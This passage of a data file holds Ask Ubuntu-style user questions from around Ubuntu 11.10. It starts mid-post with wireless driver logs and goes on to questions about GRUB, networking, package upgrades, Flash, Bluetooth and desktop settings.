crc_itu_t 12627 1 rt61pci rt2x00pci 14202 1 rt61pci rt2x00lib 48114 2 rt61pci , rt2x00pci mac80211 272785 2 rt2x00pci , rt2x00lib cfg80211 172392 2 rt2x00lib , mac80211 eeprom_93cx6 12653 1 rt61pci parport_pc 32114 1 parport 40930 3 ppdev , parport_pc , lp lsmod | grep rt [ 2497.816989 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000308c , value=0xffffffff [ 2497.827112 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000308c , value=0xffffffff [ 2497.837430 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000308c , value=0xffffffff [ 2497.847528 ] phy0 - > rt2x00pci_regbusy_read : error - indirect register access failed : offset=0x0000308c , value=0xffffffff [ 2497.847632 ] phy0 - > rt61pci_wait_bbp_ready : error - bbp register access faile d , aborting . [ 2497.847637 ] phy0 - > rt61pci_set_device_state : error - device failed to enter state 4 ( -5 ) . sudo lshw -c network *-network disabled description : wireless interface product : rt2561/rt61 rev b 802.11g vendor : ralink corp. physical id : 5 bus info : pci @ 0000:01:05.0 logical name : wlan0 version : 00 serial : fa : b8:14:58:62:35 width : 32 bits clock : 33mhz capabilities : pm cap_list ethernet physical wireless configuration : broadcast=yes driver=rt61pci driverversion=3.0.0-12-generic firmware=0.8 latency=0 link=no multicast=yes wireless=ieee 802.11abg resources : irq:16 memory : fdef8000-fdefffff iwlist scan lo interface does n't support scanning . eth0 interface does n't support scanning . wlan0 failed to read scan data : network is down uname -mr 3.0.0-12-generic i686 edit 1 $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no on reboot , sudo lshw -c network returns network is ok. hovever , wpa keeps on asking the wireless key
81430	how do i update grub to also load mandriva ?	forgive me if this has been covered before - it probably has , but i am new to ubuntu and linux in general - only made the swap in last couple of months . i have mandriva installed on my wifes laptop , and for various reasons she wanted to replace her linuxmint installation with ubuntu . when ubuntu 11.10 installed , it recognised the mandriva installation , and created entries in the grub bootloader for `` linux ( on dev/sda1 ) '' which 'should ' be the mandriva but i get the error message '' error : no such partition '' under mint ( which is built on ubuntu ) i could manually edit the /boot/grub/grub.cfg to correctly locate the partition ( for some reason ubuntu does not set it right ) which config file do i need to correct ? i am assuming i need to launch editor from terminal using sudo command to get root priviledges ? i am guessing ubuntu uses gedit too ? ` fdisk -l disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00044f36 device boot start end blocks id system /dev/sda1 * 63 226195199 113097568+ 83 linux /dev/sda2 226195261 488396799 131100769+ 5 extended /dev/sda5 226195263 234372284 4088511 82 linux swap / solaris /dev/sda6 479608832 488396799 4393984 82 linux swap / solaris /dev/sda7 234373120 253902847 9764864 83 linux /dev/sda8 253904896 479604735 112849920 83 linux partition table entries are not in disk order ` thanks
81435	how to tag a compilation album contains multiple artists on each track ?	i have a huge collection , currently my music like this : music ├── album 1 │ ├── track 1 ( artist 1 , artist 2 ) │ ├── track 2 ( artist 2 , ) │ ├── track 3 ( artist 3 , artist 2 , artist 4 ) │ ├── track 4 ( artist 4 , artist 4 ) │ └── track 5 ( artist 5 , artist 6 ) ├── album 2 │ ├── track 3 ( artist 2 , artist 4 ) │ ├── track 4 ( artist 7 , artist 5 ) │ └── track 5 ( artist 8 , artist 6 ) ├── album 3 │ └── track 1 ( artist 1 , artist 2 ) ├── album 4 │ └── track 2 ( artist 3 , artist 1 ) └── album 5 └── track 3 ( artist 1 , artist 7 ) what is the best way to tag this music files for better usability on banshee/rhythmbox ?
81436	how to change yakuake shortcut key ?	i 've just installed yakuake in kubuntu 11.10 , but can not see it in the `` custom shortcuts '' settings . how to change shortcut to win+~ in this case ?
81438	how to get my eth0 up and running ? i have tried all but none bring this up	ubuntu 11.04 . why the eth0 gets down , is there no tools or script to bring it up ? i tried several way , but none worked . any idea ? 1 ) vim /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp 2 ) ifup eth0 a ) ssh stop/waiting ssh start/running , process 1723 b ) ifup eth0 ifup : interface eth0 already configured 3 ) restarted networkmanager but same no luck follow up : 1 ) sudo update-rc.d -f networkmanager remove 2 ) sudo apt-get install dhcpcd 3 ) dhcpcd eth0 4 ) ifup eth0
81440	update manager does not work	the message displayed is : failed to download repository information check your internet connection
81446	how do i set up network boot in mythbuntu ?	i would like to use mythtv frontend systems that have no local storage . how do i set them up to boot from a network drive ( mythbuntu-diskless ) ?
81452	how to mount different nfs volumes depending on the connected network ?	scenario : i use the same notebook at work and at home : at work i have 13 nfs mappings split over two different ips . at home i have one mapping on a third ip . problem : when i get home and turn on the notebook , it takes a long time to boot due to the missing ips present on my fstab . solution : maybe there is a way to add conditional blocks on fstab or perhaps use different fstab files depending on the network i am connected to . is that possible or is there an alternate solution ?
81453	accessing home directory hangs	occasionally my laptop will hang when trying to access my home directory . the only fix so far is to reboot and then it goes away for a week . /var/log/kern.log has the following error : nov 21 13:54:39 laptop1 kernel : [ 231480.428107 ] info : task ls:10104 blocked for more than 120 seconds . nov 21 13:54:39 laptop1 kernel : [ 231480.428114 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . nov 21 13:54:39 laptop1 kernel : [ 231480.428120 ] ls d f5dbf6a0 0 10104 9964 0x00000004 nov 21 13:54:39 laptop1 kernel : [ 231480.428130 ] f3edbd40 00000086 00000001 f5dbf6a0 00000000 00000001 c175dfe0 c1868ec0 nov 21 13:54:39 laptop1 kernel : [ 231480.428145 ] c1868ec0 054eadaf 0000d250 f5005ec0 ee940cc0 f3e5b300 f3edbcf8 c10e8bfa nov 21 13:54:39 laptop1 kernel : [ 231480.428159 ] f3edbd10 f3edbd10 f3edbd10 c102b505 fffba7e8 089fa000 f3edbd38 c10fb528 nov 21 13:54:39 laptop1 kernel : [ 231480.428173 ] call trace : nov 21 13:54:39 laptop1 kernel : [ 231480.428189 ] [ < c10e8bfa > ] ? lru_cache_add_lru+0x2a/0x50 nov 21 13:54:39 laptop1 kernel : [ 231480.428199 ] [ < c102b505 > ] ? __kunmap_atomic+0x75/0xa0 nov 21 13:54:39 laptop1 kernel : [ 231480.428207 ] [ < c10fb528 > ] ? do_anonymous_page+0x1f8/0x280 nov 21 13:54:39 laptop1 kernel : [ 231480.428218 ] [ < c152b656 > ] __mutex_lock_slowpath+0xc6/0x120 nov 21 13:54:39 laptop1 kernel : [ 231480.428225 ] [ < c152b304 > ] mutex_lock+0x24/0x40 nov 21 13:54:39 laptop1 kernel : [ 231480.428246 ] [ < f83ab87c > ] cifs_reconnect_tcon+0x13c/0x2a0 [ cifs ] nov 21 13:54:39 laptop1 kernel : [ 231480.428255 ] [ < c152fa00 > ] ? vmalloc_fault+0xee/0xee nov 21 13:54:39 laptop1 kernel : [ 231480.428262 ] [ < c152fc2f > ] ? do_page_fault+0x22f/0x4a0 nov 21 13:54:39 laptop1 kernel : [ 231480.428276 ] [ < f83abe3c > ] smb_init+0x2c/0x90 [ cifs ] nov 21 13:54:39 laptop1 kernel : [ 231480.428285 ] [ < c11aa42e > ] ? ext4_htree_store_dirent+0x2e/0x120 nov 21 13:54:39 laptop1 kernel : [ 231480.428301 ] [ < f83b0941 > ] cifssmbqpathinfo+0x41/0x210 [ cifs ] nov 21 13:54:39 laptop1 kernel : [ 231480.428319 ] [ < f83c39e4 > ] ? cifs_get_inode_info+0x224/0x390 [ cifs ] nov 21 13:54:39 laptop1 kernel : [ 231480.428336 ] [ < f83c3a21 > ] cifs_get_inode_info+0x261/0x390 [ cifs ] nov 21 13:54:39 laptop1 kernel : [ 231480.428354 ] [ < f83bb35d > ] ? build_path_from_dentry+0xcd/0x250 [ cifs ] nov 21 13:54:39 laptop1 kernel : [ 231480.428362 ] [ < c102b69e > ] ? kmap_atomic_prot+0xde/0x100 nov 21 13:54:39 laptop1 kernel : [ 231480.428370 ] [ < c152c4cd > ] ? _raw_spin_lock+0xd/0x10 nov 21 13:54:39 laptop1 kernel : [ 231480.428388 ] [ < f83c6378 > ] ? _getxid+0x58/0x80 [ cifs ] nov 21 13:54:39 laptop1 kernel : [ 231480.428405 ] [ < f83c4f81 > ] cifs_revalidate_dentry_attr+0x111/0x1a0 [ cifs ] nov 21 13:54:39 laptop1 kernel : [ 231480.428423 ] [ < f83c50e2 > ] cifs_getattr+0x52/0x120 [ cifs ] nov 21 13:54:39 laptop1 kernel : [ 231480.428431 ] [ < c112c5b2 > ] vfs_getattr+0x42/0x70 nov 21 13:54:39 laptop1 kernel : [ 231480.428448 ] [ < f83c5090 > ] ? cifs_revalidate_dentry+0x40/0x40 [ cifs ] nov 21 13:54:39 laptop1 kernel : [ 231480.428455 ] [ < c112c647 > ] vfs_fstatat+0x67/0x80 nov 21 13:54:39 laptop1 kernel : [ 231480.428461 ] [ < c112c680 > ] vfs_lstat+0x20/0x30 nov 21 13:54:39 laptop1 kernel : [ 231480.428468 ] [ < c112c946 > ] sys_lstat64+0x16/0x30 nov 21 13:54:39 laptop1 kernel : [ 231480.428475 ] [ < c11341ed > ] ? link_path_walk+0x79d/0x8a0 nov 21 13:54:39 laptop1 kernel : [ 231480.428483 ] [ < c152c8e4 > ] syscall_call+0x7/0xb
81454	how do i set up panning in a viewport ?	i am trying to make my desktop larger than my screen , thus making my screen a `` viewport '' . when i run : xrandr -- output lvds -- mode 1280x800 -- fb 1600x1600 -- panning 800x600 my desktop increases in size when i run this command , but my screen does not pan when i move the mouse to the edge what is wrong and how can i fix it ?
81458	installing xubuntu recommended apps	i recently installed xubuntu over my ubuntu 11.10 installation ( i sometimes ca n't stand unity ) without installing the recommended applications . how can i now install them ?
81459	can i run notifyosd in gnome ?	i use the gnome shell ( 11.10 ) but am not liking its notification system . is it possible to return to lucid - style notifications ? like this instead of this
81463	creative zen does not work in banshee or rhythmbox	neither banshee nor rhythmbox will see files on creative zen . right clicking on zen player and selecting `` properties '' causes both banshee and rhythmbox to exit . all mtp plugins & libraries seem to be installed . this worked perfectly on 10.10 . issue replicated on several 11.10 installations on acer aspire desktop , acer 5552 laptop and panasonic cf52 laptop .
81465	how to troubleshoot bluetooth connection with headset ?	how can i troubleshoot or debug my bluetooth headset connection in 11.10 ? i am able to successfully create a working connection to my bluetooth headset . i am able to route the input and output to the headset in the `` sound settings '' menu . but after the first time i disconnect the headset , i can never reconnect the device . the only way to re-establish a connection is to delete the device and add it again . i am using a bluetooth usb dongle in a thinkpad t42 laptop . on the same machine , i am able to establish a working connection for my bluetooth mouse that survives disconnects . in fact the mouse automatically re-establishes a connection to the laptop as soon as it 's turned back on . i 'm not so lucky with the headset , where i ca n't even re-establish the connection manually to the headset . if there is a way to see what 's happening when the headset tries to connect ( e.g . log files or terminal command ) , i may be able to figure out why it is not successfully connecting . any help would be much appreciated .
81467	no hdmi signal after installing and rebooting	until reboot i have a signal via hdmi on my external monitor . afterwards there is nothing - the display-settings shows only one monitor . i am using a nvidia graphics engine with the latest drivers - i tried all possible drivers . how can i restore the visibility ?
81469	is it normal to not have desktop effects after installing on an asus n53s ?	i 've just installed 11.10 and so far so great , except i just discovered ( after looking at another installation ) i 'm missing some effects . first of all , i am using unity 3d ( i chose ubuntu at the login menu ) , and have already the correct nvidia drivers . yet , my launcher is the same from unity 2d , the same as the app switcher , and when dragging windows to screen corners , they do n't get grabbed . this `` error '' was present since the begining , so i was not able to detect it . please help , i want to have an ubuntu experience as nice as everyone else . edit 1 : i 'm using an asus n53s . my graphic card is nvidia geforce gt540m . it says cuda , if that matters .
81471	500 error on index.php file . all other php files are working well	i 've successfully installed lamp and created some virtual hosts . everything is working fine except index.php files . when i try access them , browser returns 500 error , regardless of their content . all other php files are working fine , index.html files can be opened without any errors . please , help me to resolve this problem . i guess something wrong with server configuration , but i did n't find what exactly .
81483	charm parameters configured at deployment	i am creating a juju charm that needs to have parameters passed to the configuration upon deployment . i have looked around and i know you can use juju deploy < charm > -- config= '' key : value ; key2 : value2 '' but i can not figure out where do those fit in to while creating the charm it self . how can i do this and how does it work ?
81488	differences between 10.04 and 11.10	i have no experience with linux . i bought a book ( beginner 's guide ) but it is for 10.04 . should i download 10.04 so it matches the book or use 11.10 with the book , assuming they are pretty similar ?
81489	why is playing music crashing my system ?	complete n00b here . i 'm pretty sure playing music is crashing it ( crashing : no response from keyboard/mouse - must cut power to restart ) because it does not do it when a music player is n't running . i thought it was a banshee specif issue but clementine does the same . i 've been reading about `` disabling pulseaudio '' but i 'm hesitant because no one has spelled it out as being the issue .
81491	realtek rtl8168/8111e onboard nic not recognized - the everlasting problem ?	i used the newest vendor driver for my onboard nic ( board : asus m5a97 pro ) and those sites to get it running on kernel 3.0 : http : //www.twm-kd.com/linux/realtek-rtl81688111e-and-ubuntu-linux/ the problem now is , that this does n't work with either kernel 3.1 or 3.2 : https : //code.google.com/p/r8168/issues/detail ? id=6 my question is : does anyone have a solution to get it run on the newest kernel ? or is this a plaque i have to carry forever ?
81500	how to print in black and white for canon printers	i am using a canon mp280 printer , which i found a driver from canon on the european site for . the print dialogue does not allow me to print in black and white unfortunately . does anyone know of a way for me to force this ? i 'm guessing it is just a fault with my printer driver , but i feel like greyscale printing should be something in the os sending the job , not in the printer drivers part .
81553	how to add korean keyboard ?	how do i add the korean keyboard typing system ? i 'm currently usins ubuntu 11.10 . i have tried adding the korean keyboard under setting > keyboard layout , but it does n't allow me to type in korean .
81565	get disk utilization by file-type ?	is there a way to get a break down of a disk ( or directory ) utilization based upon file-type from the command line ? i guess i could write a bash script to find+du based upon a few known file-types , but i 'd rather not recreate the wheel if there is a package that already exists to parse this .
81571	shutter unable to capture website	shutter is not able to capture website in 11.10 . it gives the following error : i changed shutter preferences to save in jpg but apart from the extension the error remains the same . any ideas ?
81585	what is `` dist-upgrade '' and why does it upgrade more than `` upgrade '' ?	i was wondering why upgrade sometimes does n't want to upgrade certain parts of the system , while dist-upgrade does . here 's an example after running update : apt-get upgrade : rimmer @ rimmer-lenovo-ideapad-s10-2 : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : linux-generic linux-headers-generic linux-image-generic 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . versus apt-get dist-upgrade : rimmer @ rimmer-lenovo-ideapad-s10-2 : ~ $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following new packages will be installed : linux-headers-3.0.0-13 linux-headers-3.0.0-13-generic linux-image-3.0.0-13-generic the following packages will be upgraded : linux-generic linux-headers-generic linux-image-generic 3 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . need to get 48.5 mb of archives . after this operation , 215 mb of additional disk space will be used . do you want to continue [ y/n ] ? in other words , why ca n't this be performed by upgrade ?
81587	software center stuck on loading screen	ive just installed ubuntu 11.10 and updated it . when i run software center it just sits at the loading screen forever . software center did work before i added the canonical-partners source .
81589	clicking logout and/or shutdown does nothing	as a newbie to ubuntu 11.10 , recently i am facing a problem where if i click either logout or shutdown option ( s ) , it does nothing . i mean absolutely nothing . though hibernate option is working normally . kindly help me out here friends so that i can properly logout/shutdown my laptop .
81595	firefox not detecting flash 11	i installed the flash 11 plugin using the software center ( and have also removed the reinstalled it via command-line in the terminal ) , yet firefox still claims the latest version of the plugin i have is 10 . ( and just to clarify , i have been sure to reboot both firefox and the entire computer after installing ) . on further investigation ( this may be a red herring , pardon ) i ran the uname -a command-line in terminal to assure that i was running the 64-bit version of ubuntu , and received this feedback : 3.0.0-13-generic # 22-ubuntu smp wed nov 2 13:25:36 utc 2011 i686 i686 i386 gnu/linux i do n't understand the series `` i686 i686 i386 '' . which applies to my version of ubuntu ? does this mean i 've accidentally installed 32-bit ubuntu ? very much a beginner here - i 've combed the threads but have so little understanding what my exact issue is that i have n't been able to find an answer .
81598	low disk space : home/user folder occupies 94gb	i am low on disk space and when i check the disk usage analyzer ( using gksudo baobab ) it indicates that my home/teddy folder is using 94gb , but when i browse through its contents i can only account for about 1gb of that usage . i 've tried sudo apt-get clean and deleting the cached package files from synaptic package manager , emptied trash but that has not changed the amount of free space i have . it seems similar to this problem but using the root disk usage analyzer has not given any insight into what is consuming so much space . any ideas ?
81602	does seeding torrents affect the harddisk ram caching ?	i 've downloaded a lot of torrent files and while i 'm seeding them , i 've noticed that very often when i start the browser it 's slow and the hard disk activity indicator is on . usually when i start a program it gets cached in ram and starting it again is very quick , and i have 3 gb of ram so usually it stays cached nearly forever . but when my torrent client is seeding it seems that after an hour programs that i ran are no longer cached in ram . i was thinking maybe it 's because of the disk reads which the torrent client performs are cached and fill up ram eventually . but i do n't think they need to be , as they are read only once and are unlikely to be read again soon . so my questions are - is this the way i think , and if so is it possible in principle to prevent the disk reads from being cached ? i can try to edit the source code of the program .
81603	create a snapshot/backup of my amazon ubuntu instance	hi all i want to backup my amazon instance currently running on ubuntu 10.4 lts , anyone know how to do that ? i also have a cent-os instance which i bakup and restore by creating snapshots and images where necessary but i have been unable to do this with ubuntu . : (
81606	how do i force apt-get to install a package that will not install due to a bug introduced by ubuntu 11.10 ?	ubuntu 11.10 separated out python-profiler from the python standard library due to licensing philosophies . ( according to what i could google , correct me if i 'm wrong . ) this is an active bug since october for 11.10 . i have python 2.7.2 installed , so the dependency errors are wrong . 'apt-get check ' does not resolve the problem . what is the best way to resolve to this ? thank you . sudo apt-get install python-profiler reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : python-profiler : depends : python ( > = 2.5 ) but it is not going to be installed depends : python ( < 2.8 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
81610	how to enable compiz in vmware fusion	i am using macbook pro with os lion . i have installed ubuntu 11.10 on my vmware fusion 4.1.0 . i am wondering is there any way to activate the compiz / 3d . i am new here and i really want to use ubuntu 11.10 with my mac os x lion vmware fusion .
81613	ubuntu option disappear from grub 11.10 after update on a dual partition	after today 's update nov. 22 , 2011 ubuntu option disappear from grub 11.10 on my dual partition . some of fdisk -l : device boot system /dev/sda1 * hpfs/ntfs/exfat /dev/sda2 extended /dev/sda5 linux /dev/sda6 linux swap / solaris device boot id system /dev/sdb1 * c w95 fat32 ( lba ) i also ran this : grub-probe -t device /boot/grub to see where the grub was got this error : grub-probe : error : can not find a device for /boot/grub ( is /dev mounted ? ) . did this too : sudo update-grub got the same error : /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) . i also tried to boot repair gui but it only shows mbr option and no grub . when i turn the computer on i get : no such file : grub rescue > any help would be much appreciated . edit : i also mounted the linux partition : sudo mount /dev/sda5 /mnt mount : /dev/sda5 already mounted or /mnt busy mount : according to mtab , /dev/sda5 is already mounted on /mnt and ran the above commands and got the same errors as above . also did as tohuwawohu instructed : umount /mnt sudo fsck -p /dev/sda5 fsck from util-linux 2.19.1 /dev/sda5 : clean , thanks again . any help would be awesome .
81621	external hard drive failing , is backup recovery possible ?	i have a seagate freeagent external hard drive . while i was backing it up on windows xp my pc crashed and i received the horrifying `` delayed write error '' when i rebooted citing `` $ mft '' and a few other files . i tried to unmount it , but to no avail . now my pc just crashes when i try to access it via windows . in ubuntu i am able to view it through disk utility . smart status is `` disk failure imminent '' . fdisk does n't work , and the smart tests fail on `` reallocated sector count '' . is there any way for me to rescue any of my data . i can still access the drive but as soon as i do that it crashes .
81627	close button closes application behind the actual one . what is the problem ?	occasionally when i hit the close button ( 'x ' on the left ) instead of closing the application i am looking at , it closes another application . a very common example situation : i am using firefox , and then i open the trash directory . then i click in the close button and the trash do not go away , but firefox does . how can i work around this problem ?
81628	will nvidia optimus be supported in 12.04 ?	'cause i 'm the owner of a acer timeline with a geforce / cuda / optimus gc , and i want use it with linux ...
81632	ca n't import gadu gadu contact list from server	i ca n't import gadu gadu contact list from server . i am using empathy 3.2.0.1 on ubuntu 11.10 with gnome shell .
81635	how do i combine multiple grep commands ?	i have a command like this : | grep -v @ param | grep -v @ return | grep -v @ test | grep -v @ throws and its getting bigger , is there any way to make this neater ?
81638	3g modem is getting disconnected and not showing anymore in network manager icon	i am using a bsnl 3g modem in india . i 've noticed that , after using it for a time , internet is getting disconnected and it is disappearing from network manager icon . in order to connect again , modem must be removed and re-inserted . how can this be corrected ?
81640	alt-tab application switchers do n't show miniatures	i can not change the behavior of alt-tab . it only shows icons , not miniatures . i can change key-bindings in compiz config , but not the behavior . also , ring switcher , shift switcher etc . does not appear .
81647	upgrading server 9.10	i have ubuntu 9.10 server . today when i tried to use apt-get upgrade i got 404 not found errors on each package . i 've checked the repo directories manually and in fact there are no such verions of files requested by the apt . what should i do ? please help ...
81648	how do i change / spoof my mac address and easily switch between multiple ones ?	my router can do port-forwarding based on mac addresses . that is , a specific mac will get a specific ip , for which i can configure a set of ports to be forwarded . in order to easily change that set of ports , i 'd like to have different connections in the network manager . how do i change the mac address for a network connection ?
81651	does ubuntu appdev support applications written on adobe air technology ?	does ubuntu approve an application which is written using adobe air technology ? yes , we know adobe abandoned support for air for linux . but still we can use adobe air 2.6 and create applications using that .
81652	dell vostro 3500 bluetooth led always stays on even if i turn it off	the led on the laptop itself is always on , even when i turn off the bluetooth in os it stays on . how can make it work properly . on the same laptop , i ca n't make bluetooth off by default . i tried disabling it in `` startup applications '' the problem is that bluetooth is n't even there .
81653	how do i configure my touchscreen to scroll ?	i like to use my touchscreen to scroll . device enabled ( 121 ) : 1 coordinate transformation matrix ( 123 ) : 0.365000 , 0.000000 , 0.000000 , 0.000000 , 0.635000 , 0.000000 , 0.000000 , 1.000000 , 0.640000 device accel profile ( 242 ) : 0 device accel constant deceleration ( 243 ) : 1.000000 device accel adaptive deceleration ( 244 ) : 1.000000 device accel velocity scaling ( 245 ) : 10.000000 evdev axis inversion ( 246 ) : 0 , 0 evdev axis calibration ( 247 ) : < no items > evdev axes swap ( 248 ) : 0 axis labels ( 249 ) : `` abs x '' ( 259 ) , `` abs y '' ( 260 ) button labels ( 250 ) : `` button unknown '' ( 241 ) , `` button unknown '' ( 241 ) , `` button unknown '' ( 241 ) , `` button wheel up '' ( 127 ) , `` button wheel down '' ( 128 ) evdev middle button emulation ( 251 ) : 0 evdev middle button timeout ( 252 ) : 50 evdev wheel emulation ( 253 ) : 1 evdev wheel emulation axes ( 254 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 255 ) : 10 evdev wheel emulation timeout ( 256 ) : 200 evdev wheel emulation button ( 257 ) : 4 evdev drag lock buttons ( 258 ) : 0 the manual from www.x.org says it 's the 4th button by default ... but i neither know how to gesture to scroll , nor the buttons 0,1 seem to work .
81659	how to keep bluetooth configuration through a fresh install ?	i still prefer upgrading through a cleen install and preserving my /home directory . however , i always have to pair my bluetooth devices after a fresh install . where is the configuration stored so that i can just copy some files after a fresh install ? i use the bluetooth indicator , but it does not seem to store the information on my devices in /home .
81660	how can i edit my grub bootloader entries ( hide , rename , remove ) ? preferably doing it manually , and not with a program	so basically i have a pretty flooded grub bootloader , with older linux versions , 3 operating systems and memtests . what i want is to leave the operating systems only . i need to know how to do it manually , and i need someone to tell me what should i be aware of when a new kernel is released . thanks in advance .
81663	how well does the built-in gpu in a intel core i5 2500k support unity ?	how well does the built-in gpu in a intel core i5 2500k support unity ? will i need a discreet graphics to run it ?
81666	how can i disable as much `` flair '' as possible in unity ?	i 'm running ubuntu 11.10 from a fresh install on a somewhat aged computer , so i have some speed problems . but since i do want to use the new cool way to work with things that unity introduces i do not want to fiddle with getting another desktop environment . my idea is to disable as much flair as possible , but there are tonnes of options that i do not understand or have the time to read up on when i launch compizconfig settings manager . which of these could safely be disabled ? are there other places where performance could be gained by disabling things ? so how can i make the whole thing a little more snappy ?
81667	can not boot live usb with ubuntu on a specific pc , on others the usb works fine ?	what i do : i prepare ubuntu live usb and boot with it . i select the usb pen drive . the pc tries to boot from it . what happens i receive an error message : boot error . what is expected : a normal boot procedure . some other information : 1 ) no matter how i prepare the usb , i get the same result . the usb works just fine on some other pc . 2 ) the pc will boot from usb made to boot ms-dos . 3 ) the pc is dual-boot , win7 and ubuntu ( installed from cd ) 4 ) the bios is phoenix-award ( version of bios dated 2008 ) , the motherboard is comparatively new .
81674	how to edit whitelisted apps in the notification area in gnome fallback session ?	in order to edit which whitelisted apps are visible in the notification area , i normally could use dconf editor and edit from the unity panel entry as shown here . the thing is , i have gnome fallback installed only , so the unity panel entry is obviously not present in dconf so how can i edit the notification area , in order to remove the second battery icon that is visible ? thanks for your help ( edit ) here is a pic of what i need to remove , its the first battery icon , which is in the notification applet , not the indicator applet
81676	panel shadow missing under unity	i no longer have a shadow under the panel in unity on the account i use . i do n't know the exact moment when the shadow disappeared . might have happened after a unity crash ( it crashed a lot ) . i created another account and using that account i get the panel shadow . how do i make it reappear under my `` normal '' account ?
81679	how can i install python-envisage ?	my question is about how i can install ubuntu 11.10 packages on ubuntu 10.04 . i would like to install python-envisage ( 4.0.1 ) , but in the ubuntu 10.04 software center there is only python envisage v3.1.1 . also , the package is renamed from python-envisagecore to python-envisage .
81680	system shows `` battery critically low ''	i am using ubuntu 11.10 on vaio . whenever i unplug the charger from my laptop , there comes a dialog showing `` battery critically low '' and system suspends , even when the charge is 100 % .
81685	how do i install dockbarx ?	how do i install dockbarx on ubuntu 11.10 ? when i am going to install it says : dockbarx : depends : python-gnomeapplet but it is not installable how do i solve this ?
81691	banshee hangs on the `` import '' dialog	i tried to import some .mp3 files from a memory stick into banshee on my netbook . i tried several times but each time , as soon as i opened the import dialog , banshee hung . i waited several minutes and still nothing . i looked in top and banshee was using 100 % cpu . i finally resorted to installing rhythmbox and it worked fine . any ideas on what happened with banshee ?
81695	how to show all searched results in pdf in a glance ?	in evince , when searching some text in a pdf file , the result will be displayed one by one by hitting `` next '' or `` previous '' button . i wonder if it is possible to glance at once all found results with a little context for each in either evince or other software ? i remember adobe acrobat seems to be able to do this , and djview can also do the same for djvu files .
81699	`` ca n't cd to /var/cache/flashplugin-installer '' error when i try to install flash	$ sudo aptitude install flashplugin-installer the following partially installed packages will be configured : flashplugin-installer no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 15 not upgraded . need to get 0b of archives . after unpacking 0b will be used . setting up flashplugin-installer ( 11.1.102.55ubuntu0.10.10.1 ) ... cd : 161 : ca n't cd to /var/cache/flashplugin-installer dpkg : error processing flashplugin-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : flashplugin-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover :
81703	how to replace unity with gnome shell via ubuntu software center ?	imho , unity is just as productive and functional as gnome shell , and since for me , gnome shell looks a lot more stylish , i would like to replace unity in ubuntu 11.10 with gnome shell . edit : without a further thought , i opened the ubuntu software center > searched `` gnome shell '' and installed it . and since i use auto-login , ubuntu logs-me-into unity . to prevent that ... i want to uninstall unity completely . how do i do that ? after doing the above , gnome shell loads by default right ?
81710	how to download code with weird interface	here is a code for eclipse drag and drop http : //www.vogella.de/code/de.vogella.dnd.jface/codestartpage.html i would like to download it , how to do it using wget ?
81714	how to escape spaces in pwd path when creating a boost build script ?	i want to compile boost with some specific options ( eg : using zlib from its latest source ) so i try next bash code like : wd=`pwd` # // ... cd $ boost_root_dir echo_run ./bootstrap.sh # // problem with \ '' $ wd/ $ zlib_root_dir\ '' echo_run ./b2 -j4 -d0 debug release -- toolset=gcc -- with-thread -- with-system -- with-filesystem -- with-program_options -- with-regex -- with-date_time -- with-iostreams -szlib_source=\ '' $ wd/ $ zlib_root_dir\ '' link=static runtime-link=static -- prefix=./ $ boost_install_subdir install echo done ! but i get next outputfrom b2 : ./b2 -j4 -d0 debug release -- toolset=gcc -- with-thread -- with-system -- with-filesystem -- with-program_options -- with-regex -- with-date_time -- with-iostreams -szlib_source= '' /home/tim/рабочий стол/mask-viewer-standalone/maskloader/zlib_libraries '' link=static runtime-link=static -- prefix=./install-dir install notice : could not find main target стол/mask-viewer-standalone/maskloader/zlib_libraries '' notice : assuming it is a name of file to create . which is preatty scarry ! ( ( стол is part of russian ubuntu translation of desctop - рабочий стол ) so i wonder - what i do wrong - how to make b2 friend of paths with spaces ?
81716	why does eclipse install to this directory ?	after installing eclipse ide via apt-get install eclipse i found the eclipse folder in directory : /usr/share/eclipse but after i found directions that i must copy this folder to the directory : /usr/local/eclipse . please , help me understand two points : why does eclipse install in /usr/share ? why not the other directory ? and why must i move the folder to the /usr/share directory ?
81722	unable to login to desktop	i ca n't log it to my xubuntu account . all it does is log me back out . help me . my school project is in there ! ! ! i tried using a live cd to get back in but i encrypted the folder ...
